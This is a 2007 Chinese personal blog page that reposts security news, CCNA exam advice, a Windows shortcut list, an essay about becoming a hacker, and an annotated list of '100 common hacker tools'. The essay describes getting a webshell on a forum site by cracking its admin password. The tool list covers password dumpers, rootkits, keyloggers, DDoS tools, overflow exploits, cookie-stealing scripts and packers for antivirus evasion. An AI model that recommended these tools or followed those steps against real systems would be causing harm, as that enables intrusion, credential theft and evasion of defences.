Solo 的个人资料Solo的养心殿照片日志列表更多  |  工具 帮助 |
|
12月23日 07年Mac OS发布234个高危漏洞 十倍于Windows系统07年Mac OS发布234个高危漏洞 十倍于Windows系统
来源:赛迪网 时间:2007-12-20 11:12:03
据国外媒体报道,今年Windows系统共曝出了23个“高危”漏洞。相比之下,Mac OS的高危漏洞数量相当于Windows十倍之多。
据悉,Windows Vista和XP共曝出23个高危漏洞,而Mac OS曝出234个高危漏洞。当然,并不能通过该组数字来衡量一款操作系统的安全性。关键是,在这些安全漏洞中,有多少有可能被利用并导致系统被攻击。
而且,这只是“高危”漏洞的数量。“高危”漏洞的危险等级为“2”,而在最严重的“极危”漏洞数量中,Windows Vista和XP共曝出4个漏洞,而Mac OS则并未曝出任何漏洞。
此外,在“中危”漏洞方面,Vista和XP共有3个漏洞,而Mac OS为2个。在“低危”漏洞中,Vista和XP共有4个,而Mac OS为7个。
思科安全代理软件曝漏洞 可导致 Windows系统崩溃思科安全代理软件曝漏洞 可导致 Windows系统崩溃
来源:赛迪网 时间:2007-12-10 11:12:01
据国外媒体报道,思科日前提醒Windows用户,其安全代理软件(Cisco Security Agent)存在漏洞,可导致Windows系统遭到攻击。
思科表示,该漏洞存在于Security Agent所使用的一个驱动中。通过发送恶意数据,可以致使Windows缓冲区溢出,最后导致系统崩溃。
对此,思科建议用户尽快将Security Agent软件升级到新版本。据悉,思科的很多产品中都安装了Security Agent软件,例如Cisco Security Manager、Cisco Unified Communications Manage和Cisco Voice Poral。
业内人士认为,如果黑客能够找出利用该漏洞运行代码的方法,那么其后果将是相当严重的。 12月13日 CCNA报名考试及培训应注意CCNA报名考试及培训应注意
思科认证考试注意事项 考试注册信息表中的内容,直接关系到将来的考试注册和证书发放相关事宜,请您认真填写。
考试是在规定的时间并在保密的环境中进行,多数考试需要大约一到三个小时。 现场考试的注册者请您提前25分钟现场报到,迟到15分钟即取消考试资格。 考生参加考试,需向考场提供两种身份证件,至少一种带有照片的政府颁发的身份证或护照号码以确认身份。 请提供有效的电子邮件地址,考试预约成功将通过电子邮件方式发送确认函(英文)。 所有考试都要求考生完全接受思科系统保密协议的条款和条件。 在参加考试之前,考生必须在线接受思科系统保密协议,且考试是闭卷考试。 考试是通过在线方式进行,按先后次序回答问题,不允许报考者对问题作任何“标记”和返回某道试题。 在考试完成之后,报考者会在现场收到一份成绩单。 通过考试后,有关证书事宜将会由思科公司与考生联系。 如果没有通过现场考试,考生不可以在现场进行重考,也不可退还考试费。 如果因为考生的原因没有按时进入考场,完成考试,思科公司不保证提供新的考试机会,考试费也不可退回。 Cisco公司通过思科职业证书网站提供各种考试信息:http://www.cisco.com/go/certification ·CCNA考试注意事项
在CCNA考试中不允许回头再做前面没做的题目,所以在点NEXT的时候要注意别连续快速点击,以免发生连点了直接跳过一道题的情况。 实验题中输入命令中最好是把命令写全。
实验题配置完成后一定要copy run start,否则不记分。
CCNA考试中心查询
CCNA的3门考试均可以在各个城市的Prometric考试中心或VUE考试中心进行,基本上是随到随考,没有固定的考试时间要求。 1、CCNA认证: CCNA证书说明了你拥有一定的网络知识去提供服务给中小型企业。作为CCNA的专业人才将能够安装,调试和运作局域网(LAN),广域网(WAN),和拨号网络服务给小型网络(一般来说100个节点或更少),同时能够操作IP;IGRP;IPX;Serial;AppleTalk;Frame Relay;IP RIP;VLANs;RIP;Ethernet;Access List等网络协议。
CCDA认证:
CCDA认证( 思科认证网络工程师)表示通过认证的人员具有为小型办公室/ 家庭 办公室(SOHO)市场联网的基本技术和相关技术。通过CCDA认证的专 业人员可以为有100个以下节点的网络的企业和机构设计路由和交换网 络(包括LAN、WAN和拨号访问业务)。
CCDA认证在证书档次和难度级别上与Cisco 认证体系中的售后服务方向的CCNA认证是相同的。但在考试中涉及更多方案题型
2、CCNA、CCDA考试科目:
考试号:640-801(Cisco Certified Network Associate Basics.Interconnecting Cisco Network Devices)
考试号:640-861(Cisco Certified Design Associate Designing for Cisco Internetwork Solutions )
3、CCNA、CCDA学习基础:CCNA、CCDA是CISCO的初级认证,只需要基本的网络概念和高中以上的英文水平即可参加学习 12月12日 六步看出你适不适合当黑客六步看出你适不适合当黑客
一.首先,看到这篇文章,觉得好长,好烦,懒的看,走人..
OK,我觉的你不适合做黑客. 黑客远没有你想得那么简单,黑客要看的资料太多了,要了解的东西也太多了,时间永远不够用.如果这么短 的文章都难倒你,那么你真的不适合.
二.学习黑客的目的是什么?
QQ?*Q币?*游戏号?*银行卡?偷窥别人**?可以向别人炫耀?因为某某网站的某某人的几句话,决心黑了他的 网站?因为一些理由,想去报复些人?......我都说不下去了.
只是想着这些的人不适合做黑客,做骇客去...说句老话:黑客搞建设,骇客搞破坏. 黑客应该要抱有帮助他人的想法,入侵和破解等等,只是为了提高技术,而不是靠此来获利或报复.如果你曾 经因为这些目的而学习黑客,我相信,只要你肯放弃这些不正当的目的.而去追去技术,那么你还是可以成为
黑客的.
三.怎么找个好老师来帮助学习?
一看见某些高手发文章便在后面跟句:做我师傅吧!;你QQ多少?加我QQ*****,我有问题;我决心学黑客,请做 我师傅吧,我一定很努力的学……等等,
看到这些话就想吐,你以为真正的黑客会留意你?会帮助你?只有一些认为你傻的人,才会加你,然后看看你" 傻不傻".当然,有些好心人会帮助你,但毕竟是少数,而且很浪费时间.你还在做这些事?那我劝你别学什么
黑客!别抱有侥幸的心理,更不要浪费时间!
你连"百度"这么好的老师都不懂利用?你不知道什么,只要打进去几个关键字就可以很快的知道答案(比 如,"骇客"只要你复制这2个字,敲几下键盘,马上就能明白是什么意思了),何必去加人QQ,在论坛里面留言,
每天都来留意,结果却等不到答案(对于这种人,我通常是告诉他去搜索).
一个有技术的黑客老师,只要你认真学习,你就会明白什么时候需要. (你可以去试试提一个问题计算下,如果你不懂的计算,那你认真去学习+-*/,那样还有机会学习黑客) 四.怎么过滤信息?
好了,看了第三步你应该知道怎么用百度了吧(不知道再看第三步或是走人!)? 但是,百度上面的信息真是太杂了.你必须要学会过滤信息:排除我非常爱你信息和有危害的信息,留下有用 信息和安全信息.
比如你要找某个黑客工具:灰鸽子.只要去百度搜下就有一大堆可下载.因为黑客工具通常都会被杀毒软件 杀掉(不知道?百度一下吧!).有些人就在工具上做木马.所以要去一些比较正规的网站下载,千万别乱下!
再就是网站上的一些文章.很多都是重复的,没意义的(有太多前人和无聊的人提问).我们更要 过滤其中的 重复内容,提取当中的精华来仔细看.
多使用"站内搜索"相信能过滤更多的我非常爱你信息! 五.怎么学习黑客?
如果你做不到以下几点,那你不适合学习黑客. 首先,要学会提问(怎么提问?看了第三步和第四步,你可以自己去搜索下答案了.就用关键字"提问的智 慧".),一定要看明白(这样都不明白,无话可说),这样就可以不制造更多的我非常爱你信息
(我非常爱你才制造我非常爱你).也方便别人. 其次,要学会搜集资料.并有个学习方向.比如你是个初学者,那你看完这个后可以去找些:黑客学习方法(百 度啊```).上面就会教你怎么学习了.要多搜集些有用的资料或是感兴趣的资料.以后慢慢看.记的多搜集几
篇不同的文章,对比下再学习比较好
最后.要多多实践,看到了一些文章可以去试试其中教的入侵方法等等.即使不能成功(有太多原因会造成不 成功,比如:教程/漏洞太老,系统问题,网络问题,工具问题,人格问题(呵呵,开玩笑,等等.碰到不成功,千万
别急着提问.好好去搜索下,多实验几次或是找下类似的教程看看.提问的话就要好好提问,记的看"提问的
智慧"!),只要你学会当中的思路,并学会应用一些东西就已经算是学习了.
六.学习黑客的态度!
这是最重要的,可以说前面的都是在说这个! 我就说说我认为最重要的态度:耐心!!!你够不够耐心,能不能坚持,是学习黑客的一个重要态度!就比如你 看文章,看不了长的,怎么学技术?
本人学习黑客将近2个月,但我到现在还不曾抓到过肉鸡(找到过,没有控制住,555),只简单的学会用"网站 猎手"搜索DVBBS默认数据库dvbbs7.mdb,用看数据库软件找出其中的用MD5加密的管理员密码,然后用在线
MD5网站破解了简单的密码,最后备份了个ASP木马,成功的得到一个网站的webshell!(寒,都说什么啊?什么
"网站猎手","DVBBS默认数据库dvbbs7.mdb","看数据库软件","MD5","ASP木马","webshell".新手跟本就
不明白啊~再提醒一遍:我最初也不明白,但我用百度弄明白了!)
有的人一天就可以学会抓肉鸡,一天就可以学会挂马,一天就可以入侵……但是我从不心急~我给自己定了
计划,先主攻编程,再去学习其他的东西.因此我晚上学习编程,累了或是有兴趣时就学学入侵等等,由与某
些原因,其他时间就学习一些系统方面的知识,有时去了解下硬件的知识.这样虽然比别人学的慢,学的杂,
学的累(编程看不懂的地方就犯困,55555).但是始终有兴趣支持着我.我相信我不比任何人差,只要我肯努
力:D :D :D :D :D :D
最后,看完这篇文章,觉得....
马上闪人.. 我觉的你也不适合做黑客. 黑客做事要有始有终...不注意打扫! 哈(不然....可能马上就有人来找你麻烦...) 主要还是个态度! 顶个/? 我通常的做法是看到好的文章或是觉得有用的文章,就把它们复制下来(我很懒,看见长点的文章就头痛,所 以只能这样了!如果你这都懒的做,那你永远也别想学好黑客),等到觉得需要时就拿出来看.
文章来源于《黑客X档案》bing8192 泡泡网PCPOP被黑截图为证泡泡网PCPOP被黑截图为证
腾讯悄然启用QQ.COM.CN域名 黑幕再被揭起腾讯悄然启用QQ.COM.CN域名 黑幕再被揭起
已经很久没有用IE了,刚才偶尔在IE地址栏输入qq然后使用"ctrl"+"enter"键,原本以为进去的是www.qq.com,结果打开是“www.qq.com.cn”,更奇怪的是,这个域名居然可以访问,而不是之前的提示错误转到电信的114网站.经ping,发现两个域名都是解析到58.61.166.142这个IP,而且经测试,只有带www的主域名解析过来,不带www的域名解析到深圳的另外一个IP:58.60.13.71.这是不是意味着腾讯偷偷的启用了这个域名使用了呢?对于很多一直访问不了这个域名的朋友,还是有必要了解一下www.qq.com.cn被腾讯收入囊中的过程.
QQ.COM.CN莫名易主 “黑幕!”QQ.COM.CN经营者,杭州宇科信息技术有限公司总经理沈梁嘣出憋在心中许久的郁闷,他介绍说,1月7日(2004年,cnbeta注),该公司使用了近5年的域名QQ.COM.CN的注册人突然变更,作为域名代理注册商的中科三方擅自将QQ.COM.CN转户给深圳腾讯公司,整个过程没有经过该域名原注册人的同意并授权.
1月15日(2004年,cnbeta注),正在北京出差的腾讯公司首席执行官马化腾也证实QQ.COM.CN的确已回归腾讯公司,他的反应相对平静,“该域名所有者的公司已经不存在,QQ.COM.CN域名也无法过户,”在他看来,该域名理应属于腾讯公司,“腾讯公司正通过近期从海外回购的QQ.COM域名运营门户网站,但是原先QQ.COM.CN那家公司同样推出QQ交友、QQ邮箱,混淆用户,对市场造成一定混乱.”
官司赢了域名还是被拿走了
据了解,QQ.COM.CN域名为杨飞雪1999年6月23日注册.2003年1月16日,腾讯公司向域名争议解决中心提交针对QQ.COM.CN域名注册人杨飞雪的投诉书.投诉人腾讯公司的投诉理由是:1,被投诉的域名与投诉人享有民事权益的名称、标志相同,具有足以导致混淆的近似性;2,被投诉的域名持有人对域名不享有合法权益;3,被投诉的域名持有人对域名的注册和使用都具有恶意.
2003年1月20日,域名争议解决中心收到中国互联网络信息中心(CNNIC)以电子邮件发来的关于域名QQ.COM.CN的确认函,确认该争议域名由CNNIC提供注册服务;被投诉人为争议域名注册人/持有人;争议域名处于正常状态.
经过双方激烈交锋,最后仲裁委员会域名争议解决中心专家组不支持投诉人腾讯公司的投诉请求,驳回其投诉,并一致裁定维持被投诉人杨飞雪作为“QQ.COM.CN”域名注册人的合法地位.
CN域名管理机构CNNIC的原始数据库显示,自1999年6起至今,现任智科软件中国有限公司董事长的杨飞雪一直是QQ.COM.CN域名的注册人,当时杨飞雪注册时的登记公司为“北京鼎扬科技有限公司”,因公司业务转型,该公司现已注销,2003年6月16日,原有QQ.COM.CN的经营业务转由智科软件下属杭州宇科信息技术有限公司运营.
2004年初,域名注册商中科三方向智科公司致电称,“接获举报人腾讯公司举报,QQ.COM.CN域名登记时所填的北京鼎扬科技有限公司已经不存在,因此QQ.COM.CN所有者杨飞雪将不能再继续使用该域名.”接获此消息的智科公司通过官方以及私人渠道均联系过中科三方,但都被以此借口拒绝听其申辩.2004年1月7日,中科三方将QQ.COM.CN注册信息修改为“腾讯科技(深圳)有限公司”,注册人改为其北京分公司副总经理荆涛,注册年限截止到2009年.
腾讯强夺他人财产?
在2003年QQ.COM.CN域名争议案中担任被投诉方杨飞雪代理律师的于国富认为,“2003年初,中国国际经济贸易仲裁委员会域名争议解决中心的仲裁结果已经证明杨飞雪的合法性不容质疑.”据介绍,自2003年3月后,注册QQ.COM.CN的杨飞雪在杭州设立技术研发中心,开展QQ.COM.CN相关服务的研发工作,经营综合互动网站,并且该网站已经拥有一定数量的忠实用户群.
有意思的是,后来于国富成了CNNIC的法律顾问,他以身份敏感为由,拒绝对“现时情况下腾讯是否合法拥有该域名”的问题做出回答.
据知情人透露,于国富律师于半年前代理CNNIC一方参与起诉3721名誉权案一役获胜后,被CNNIC聘为长期法律顾问,而中科三方公司的前身是CNNIC三产,现已独立运营.
QQ.COM.CN域名的解析情况(2004-06-15)
Domain Name: qq.com.cn ROID: 20040107s10011s00463283-cn Domain Status: ok Registrant Organization: 腾讯科技(深圳)有限公司Administrative Email: [url=mailto:jingtao@tencent.com]jingtao@tencent.com[/url] Sponsoring Registrar: 北京中科三方网络技术有限公司Name Server:ns3.sanfront.com.cn Registration Date: 2004-01-07 09:34 Expiration Date: 2009-01-07 09:34
再看如今(2007-12-5)QQ.COM.CN域名的解析情况
Domain Name: qq.com.cn ROID: 20040107s10011s00463283-cn Domain Status: ok Registrant Organization: 腾讯科技(深圳)有限公司Registrant Name: 毛君燕Administrative Email: [url=mailto:domainname@staff.tencent.com]domainname@staff.tencent.com[/url] Sponsoring Registrar: 北京万网志成科技有限公司Name Server:dns1.imok.net Name Server:dns2.imok.net Registration Date: 2004-01-07 09:34 Expiration
Date: 2010-01-07 09:34
来源:尊米网 福彩中心网页疑被挂木马福彩中心网页疑被挂木马
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://hackbase.com/news/2007%2D12%2D08/105536744829/
网易体育12月7日消息
由于1亿大奖的出现,最近福彩的销售变得更加火爆,但是有部分网友反映,福彩中心的网页被挂木马,导致电脑中毒。
福彩最近频频开出大奖,这使得众多渴求一夜暴富的市民对福彩更加追捧,然而,随着购买及关注福彩的人数增多,福彩中心最近出现越来越多的问题。
从上周起就有网友开始反映,在登陆福彩中心网页时中了木马,黑客利用福彩中心网站的漏洞散布木马。部分网友对福彩中心的网络技术提出质疑,他们认为连网站都有漏洞可以被挂木马,那么彩票软件肯定也会存在漏洞,这些漏洞可能正是大奖出现的原因。
除了有网友反映福彩中心网页被挂木马外,昨天北京市100多间无线销售的福彩网点出现故障导致销售无法正常运行,北京福彩中心给出的解释是,中心在终端机上下载了一个新软件,但是由于无线通讯的销售系统的下载速度较慢,而且部分网点业主不熟悉操作程序,这使得部分网点无法正常销售。
福彩中心方面暂时没有证实网页是否被挂木马,电话客服时称需网友截图给技术,但是为了安全起见,广大彩民网友在登陆福彩中心网页(http://www.zhcw.com/)前请先更新一下杀毒软件的病毒库防止木马入侵。如果仍不放心,那么请暂时不要登陆福彩中心网页,彩民可以通过电视或报纸等其他途径来获得福彩的最新消息。 (本文来源:网易体育专稿 作者:文礼)
(完)
12月11日 灰鸽子病毒看上手机 提醒:不要随意开启蓝牙灰鸽子病毒看上手机 提醒:不要随意开启蓝牙
灰鸽子病毒看上手机 提醒:不要随意开启蓝牙
市民都要接收和发送大量短信,但是手机病毒也借机传播,窥探隐私,使用户的话费造成损失。 今年,一些类似“灰鸽子”的手机木马软件已经出现,例如Pbstealer木马软件,能够偷取手机中的信息并发送给控制者。此外,最近网上热卖的一款名为“手机卧底”的间谍软件,可通过蓝牙发送,悄悄安装到他人手机,既可对他人手机进行远程监听通话、监视短信,还能够下载电话本、通话记录,随时调阅短消息内容。 病毒专家表示,手机用户在公共场所不要随意开启蓝牙;不要轻易从不知名的互联网上下载文件到手机上,最好安装既有防病毒功能,又有防骚扰、防间谍功能的有实力的正规厂商的手机杀毒软件。
来源于《黑客X档案》三二 11月28日 windows组合键大全F1 显示当前程序或者windows的帮助内容。
F2 当你选中一个文件的话,这意味着“重命名”
F3 当你在桌面上的时候是打开“查找:所有文件”对话框
F10或ALT 激活当前程序的菜单栏
windows键或CTRL+ESC 打开开始菜单
CTRL+ALT+DELETE 在win9x中打开关闭程序对话框
DELETE 删除被选择的选择项目,如果是文件,将被放入回收站
SHIFT+DELETE 删除被选择的选择项目,如果是文件,将被直接删除而不是放入回收站
CTRL+N 新建一个新的文件
CTRL+O 打开“打开文件”对话框
CTRL+P 打开“打印”对话框
CTRL+S 保存当前操作的文件
CTRL+X 剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V 粘贴剪贴板中的内容到当前位置
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE 重做上一步被撤销的操作
Windows键+M 最小化所有被打开的窗口。
Windows键+CTRL+M 重新将恢复上一项操作前窗口的大小和位置
Windows键+E 打开资源管理器
Windows键+F 打开“查找:所有文件”对话框
Windows键+R 打开“运行”对话框
Windows键+BREAK 打开“系统属性”对话框
Windows键+CTRL+F 打开“查找:计算机”对话框
SHIFT+F10或鼠标右击 打开当前活动项目的快捷菜单
SHIFT 在放入CD的时候按下不放,可以跳过自动播放CD。在打开word的时候按下不放,可以跳过自启动的宏
ALT+F4 关闭当前应用程序
ALT+SPACEBAR 打开程序最左上角的菜单
ALT+TAB 切换当前程序
ALT+ESC 切换当前程序
ALT+ENTER 将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换
PRINT SCREEN 将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN 将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4 关闭当前应用程序中的当前文本(如word中)
CTRL+F6 切换到当前应用程序中的下一个文本(加shift 可以跳到前一个窗口)
在Internet Explorer中:
ALT+RIGHT ARROW 显示前一页(前进键)
ALT+LEFT ARROW 显示后一页(后退键)
CTRL+TAB在页面上的各框架中切换(加shift反向)
F5 刷新
CTRL+F5 强行刷新目的 快捷键
激活程序中的菜单栏 F10
执行菜单上相应的命令 ALT+菜单上带下划线的字母
关闭多文档界面程序中的 CTRL+ F4
当前窗口
关闭当前窗口或退出程序 ALT+ F4
复制 CTRL+ C
剪切 CTRL+ X
删除 DELETE
显示所选对话框项目的帮助 F1
显示当前窗口的系统菜单 ALT+空格键
显示所选项目的快捷菜单 SHIFT+ F10
显示“开始”菜单 CTRL+ ESC
显示多文档界面程序的系统菜单 ALT+连字号(-)
粘贴 CTR L+ V
切换到上次使用的窗口或者 ALT+ TAB
按住 ALT然后重复按TAB切
换到另一个窗口
撤消 CTRL+ Z “Windows资源管理器”的快捷键
目的 快捷键
如果当前选择展开了,要折叠 NUM LOCK+负号(-) 或者选择父文件夹左箭头折 叠所选的文件夹 如果当前选择折叠了,要展开 NUM LOCK+* 或者选择第一个子文件夹右箭 头展开当前选择下的所有文件夹 展开所选的文件夹 NUM LOCK+加号(+) 在左右窗格间切换 F6 使用 WINDOWS键
可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。
在任务栏上的按钮间循环 WINDOWS+ TAB
显示“查找:所有文件” WINDOWS+ F 显示“查找:计算机” CTRL+ WINDOWS+ F 显示“帮助” WINDOWS+ F1 显示“运行”命令 WINDOWS+ R 显示“开始”菜单 WINDOWS 显示“系统属性”对话框 WINDOWS+ BREAK 显示“Windows资源管理器” WINDOWS+ E 最小化或还原所有窗口 WINDOWS+ D 撤消最小化所有窗口 SHIFT+ WINDOWS+ M “我的电脑”和“Windows资源管理器”的快捷键
关闭所选文件夹及其所有父文件夹 按住 SHIFT键再单击“关闭按钮(仅适用于“我的电脑”)
向后移动到上一个视图 ALT+左箭头 向前移动到上一个视图 ALT+右箭头 查看上一级文件夹 BACKSPACE 使用对话框中的快捷键
取消当前任务 ESC
如果当前控件是个按钮,要单击该按钮或者如果当前控件是个复选框,要选择或清除该复选框 或者如果当前控件是个选项按钮,要单击该选项空格键 单击相应的命令 ALT+带下划线的字母 单击所选按钮 ENTER 在选项上向后移动 SHIFT+ TAB 在选项卡上向后移动 CTRL+ SHIFT+ TAB 在选项上向前移动 TAB 在选项卡上向前移动 CTRL+ TAB 如果在“另存为”或“打开” BACKSPACE 对话框中选择了某文件夹, 要 打开上一级文件夹 在“另存为”或“打开”对话框 F4 中打开“保存到”或“查阅” 刷新“另存为”或“打开” 对话框 F5 使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键 插入光盘时不用“自动播放” 功能按住 SHIFT插入 CD-ROM 可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键
Microsoft放大程序的快捷键 这里运用Windows徽标键和其他键的组合 Windows徽标+PRINT SCREEN 将屏幕复制到剪贴板(包括鼠标光标)
使用辅助选项快捷键切换筛选键开关 右SHIFT八秒 切换高对比度开关 左ALT+左SHIFT+PRINT SCREEN 切换鼠标键开关 左ALT+左SHIFT+NUM LOCK 切换粘滞键开关 SHIFT键五次 切换切换键开关 NUM LOCK五秒
11月20日 100种黑客常用工具100种黑客常用工具 ipscan 大范围网段快速ipc$猜解 svc远程安装/删除win2k服务 3389.vbs 远程安装win2k终端服务 arpsniffer arp环境sniffer(需要winpcap2.1以上) ascii查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤) ca 远程克隆账号 cca检查是否有克隆账号 cgi-backdoor 几个cgi木马(十多种最新的web脚本后门,涵盖jsp,php,asp,cgi等等) crackvnc 远程/本地破解winvnc密码(本地破用-W参数) pass.dic 密码字典 debploit win2k+sp2配置最佳权限提升工具 fpipe端口重定向工具 fscansuperscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) hgod04 ddos攻击器 idahackida溢出 idq.dll利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门) IISidq溢出 inst.zip 指定程序安装为win2k服务 ip_mail.rar发送主机动态IP的软件 ipc.vbs不依赖ipc$给远程主机开telnet ispc.exe idq.dll连接客户端 Keyghost.zip 正版键盘记录器 log.vbs日志清除器(远程清除不依赖ipc$) md5.pl 论坛md5加密密码破解器 msadc.pl winnt的msadc漏洞溢出器 MsSqlHackmssql溢出程序1 mysql-client mysql客户端 Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面) PassSniffer大小仅3kb的非交换机sniffer软件 psexec 通过ipc管道直接登录主机 pskill 杀进程高手:) pslist 列进程高手:) rar命令行下的winrar reboot.vbs 远程重启主机的脚本 sdemo.zip巨好的屏幕拍摄的录像软件 shed 远程查找win9x的共享资源 sid用sid列用户名 SkServerGUIsnake多重代理软件 SkSockServer snake代理程序 SMBCrack 超快的ipc破解软件(适合破一台机) sockchannel反向/重定向端口的后核级后门,在内网某台机安装在外网就可直接登录到内网,与网关无关* SocksCap 把socks5代理转化为万能代理 SPC.zip可以直接显示出远程win98共享资源密码的东东 sql2.exe mssql溢出程序3 SqlExecmssql客户端 SuperScanGUI界面的优秀扫描器 synsyn攻击第一高手 upx120 压缩比最大的压缩软件,木马压缩后可以躲避某些杀毒软件,但不如fsg软件好。 wget 命令行下的http下载软件 Win2kPass2 win2k的密码大盗 Winnuke攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定) smbnuke攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机) WinPcap_2_3nmap,arpsniffer等等都要用这个 WinPcap_2_3_nogui.exe无安装界面自动安装的WinPcap_2_3(命令行版) SuperDic_V31 非常全面的黑客字典生成器 getadwin2k+sp3配置的权限提升程序 whoami 了理自己的权限 FsSniffer 巨好的非交换机sniffer工具 wwwscan命令行下巨好的cgi扫描器还可以猜目录,支持无限升级(不是twwwscan) TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell) RangeScan 自定义cgi漏洞的GUI扫描器 pwdump2 本地抓winnt/2k密码散列值(不可缺) pwdump3 远程抓winnt/2k密码散列值(不可缺) procexpnt 查看系统进程与端口关联(GUI界面) nc加密传输的nc(黑客老手必用!!!!) CMD.txt 有什么cmd命令不懂就查查它 mport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强) BrutusA2全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解 cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32) regshell命令行下的注册表编辑器 nscopy备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大) session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 klogger.exe 一个简单的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 smbrelay发动smb中间人攻击的工具,在session中插入自己的执行命令(超级邪恶!!!) xptsc.rar winxp的远程终端客户端(支持win2000/xp) forceSQL.zip相当快的mssql密码暴力破解器 mssql 相当快的mssql密码暴力破解器 ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码 SQLServerSniffer.rar MSsql的密码明文嗅探器 TelnetHack.rar在拥有管理员权限的条件下,远程打开WIN2000机器的Telnet服务 RFPortXP.exeXP下关联端口与进程的程序 SQLTools.rar mssql工具包 ServiceApp.exe远程安装/删除服务 hgod具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项 HDoor.rar ping后门(icmp后门) SIDUserEnum.exe 利用sid得到用户列表(比小榕的sid工具准确) * RPC_LE.exe利用rpc溢出使win2k重启(对sp3+某些sp4hotfix有效) * c3389.exe 远程快速查询和更改Terminal Server端口 smbsniffer.exe获取访问本地IPc的主机散列值(支持截获内网主机散列,这点smbrelay做不到哦)* NetEnum.exe 通过3389+空连接获取对方主机所在域的大量信息 * aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效) sslproxy针对使用ssl加密协议的代理(可以用它扫描ssl主机) lsadump2在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) psu.exe 用指定进程的权限打开指定的程序 ldapbrowser24.msi ldap轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 rootkit 从系统底层完美隐藏指定进程,服务,注册表鍵并可以端口绑定的内核级win2k后门!!! upclass.zip 无组件上传任意类型文件的asp脚本 iecv.zip修改cookies的利器 webdav2.exe 只针对sp3的溢出程序(成功率90%) * comlog101.zip 这个工具可以在后台监听所有调用cmd.exe的动作,记录到\winnt\help下的一个指定目录 MSWebDav_O_O.exe针对webdav的溢出程序(配置:IIS sp3 some pack、url:65524 pading:9)* Webdav.pl 效果还不错 WE03b1.zip针对某一进程捕获数据包,截获IE通信数据包比较好使 DRDOS.rardrdos工具 SMysql-v1.7.zip mysql的中文客户端(支持对中文目录的操作) xLocator.exe rpc溢出程序获取最高权限(简繁体win2k和英文win2k sp0-sp3一次性成功但不如re.exe好) Remoxec.exe利用win管理规范接口(WMI)来管理远程主机,执行指定程序或是系统命令(远程主机开TCP135 端口即可) j3qhz5tk.zip 从IE缓存里读取明文密码(例如只要以前登录过outlook且不记住密码,也会把相关的密码 显示出来) newLscan.exe 扫描域控制器主机,扫描3268端口也能找到域控制器主机 re.exe win2000的rpc溢出程序(需要对方打开(RPC) Locator服务,默认只有域控制器才打开这个服务) bbsxp.pl 针对bbsxp查询密码的脚本,稍改一下可以成为不错的access injection工具 xp.asp 能上传,不需fso组件执行命令,显示环境变量等等。简直就是一个asp杀手! Getfile远程猜测web文件的perl脚本,支持无限升级。有一定用处。 lbdir.pl 远程猜测web虚拟目录的perl脚本,有一定用处。 Samba.rarsamba漏洞改良的利用程序(含扫描器),溢出成功率有98% Vredir.vxd win98的共享密码校验漏洞利用程序 ntrootkit11win2k内核级后门(有远程安装、键盘记录、ddos的功能)!!! Ginadllgina木马,只一个dll。用于记录win2k管理员登录密码:P fsg.zip很少见的压缩软件,所以有些支持脱壳的杀毒软件查不出他压缩的exe木马(比upx安全的多) * mysqlfast.rarmysql远程暴力破解程序(极快) lanqqeye.rar 可以把同一内网的所有在线(隐身)QQ号和相应IP列举出来,内网渗透和泡MM的趣味软件:) webdav.pl反向连接的webdav溢出工具 Fluxay5.rar流光5是windows平台上最好的入侵渗透黑客工具(无时间、IP限制) Cgi.exe速度超快的unicode漏洞扫描器,有时会有用。 Reboot.bat 重启本地winnt/2k的bat脚本 x.emlMIME漏洞利用程序 ptsec.exe针对sp3补丁包的最新本地提升权限程序(win2k测试通过),如ptsec /di wollf.zip功能比较实用的一个后门软件(有方便的键盘记录、sniffer功能) RpcLocator.zip 反向连接获得shell的rpc溢出程序 js网页木马.txt 利用ACTIVEx 控件做的网页木马,没利用任何IE漏洞。 Cookies.txt利用跨站脚本漏洞获得cookies的脚本 ipsecscan.exe扫描win2k的ipsec服务是否开放(渗透入侵时很有用) findpass 获取从本机/终端服务登录的用户的密码:) MS03-013_kernel_exp一个命令行下的利用ntoskrnl.exe溢出的本地权限提升工具(在sp3+win2k测试通过) Nbtscan 向指定IP段发送NetBIOS状态查询, 列出对方主机的IP地址、NetBIOS计算机名、登录用户名和 MAC地址。 Netdic字典扫描器,这个扫描器利用ipc和finger指令去收集用户名并存为字典文件(文件夹已内附多个字 典) * Makedic 字典合并器,此工具用于将一个或多个字典合并成一个字典,并去掉重复的单词. Anyguess猜测系统用户名,支持mail的rcpt、expn、vrfy,支持sunos ftp cwd, finger, samba swat, apache* Anyscan用于远程破解ftp,telnet,mail,http,pop3,wmi,ipc,smb,imap,mysql/mssql的命令行工具 * ldapscan.rar一个远程破解ldap(轻量级目录访问服务)密码的软件 * radmin一个优秀的远程图形控制软件(远程自动安装) Kbtools 都是十几k以下的小程序(1.可显示win2000环境下的***星号密码 2.强行杀掉指定进程 3.利用 wmi远程管理计算机,可以远程列进程杀进程和执行命令)* SkProcessCheck 查内核级后门的工具 